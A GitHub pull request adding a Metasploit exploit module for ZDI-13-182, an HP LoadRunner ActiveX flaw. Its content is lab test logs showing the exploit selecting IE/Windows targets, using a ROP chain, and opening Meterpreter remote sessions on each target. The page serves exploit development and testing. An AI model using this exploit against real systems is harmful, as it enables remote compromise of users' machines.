Add module for ZDI-13-182 #2290

Merged
merged 3 commits into from Aug 27, 2013


jvazquez-r7

Tested with HP LoadRunner 11.50 T7177-15028, which includes LrWebIERREWrapper.dll 11.50.2216.0 (vulnerable ActiveX).

Module testing:

  • IE 7 WIN XP
msf exploit(hp_loadrunner_writefilebinary) > [*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /FW1LWHRUM
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 7 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 3 opened (192.168.0.3:4444 -> 192.168.0.3:49287) at 2013-08-25 23:04:43 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.3 - Meterpreter session 3 closed.  Reason: User exit

  • IE 8 Win XP
msf exploit(hp_loadrunner_writefilebinary) > 
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /U7vg2FQpazSh
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /U7vg2FQpazSh
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows XP SP3
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 2 opened (192.168.0.3:4444 -> 192.168.0.3:65478) at 2013-08-25 22:50:45 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.3 - Meterpreter session 2 closed.  Reason: User exit
  • IE 8 / Win 7 SP1
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Requesting: /EeHZTmef4ROfic
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Target selected as: IE 8 on Windows 7
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 192.168.0.3      hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 192.168.0.3
[*] Meterpreter session 1 opened (192.168.0.3:4444 -> 192.168.0.3:50282) at 2013-08-26 07:47:48 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  192.168.0.3:4444 -> 192.168.0.3:50282 (192.168.172.207)

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
  • IE 9 / WIN 7 SP1
msf exploit(hp_loadrunner_writefilebinary) > [*] 10.6.0.165       hp_loadrunner_writefilebinary - Requesting: /sk1ZSrdDv
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Target selected as: IE 9 on Windows 7
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Using msvcr71.dll ROP
[*] 10.6.0.165       hp_loadrunner_writefilebinary - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50797) at 2013-08-27 09:56:43 -0500

msf exploit(hp_loadrunner_writefilebinary) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.207 - Meterpreter session 1 closed.  Reason: User exit

wchen-r7 merged commit f59f57e into rapid7:master on Aug 27, 2013
jvazquez-r7 deleted the zdi_13_182 branch on November 18, 2014 15:58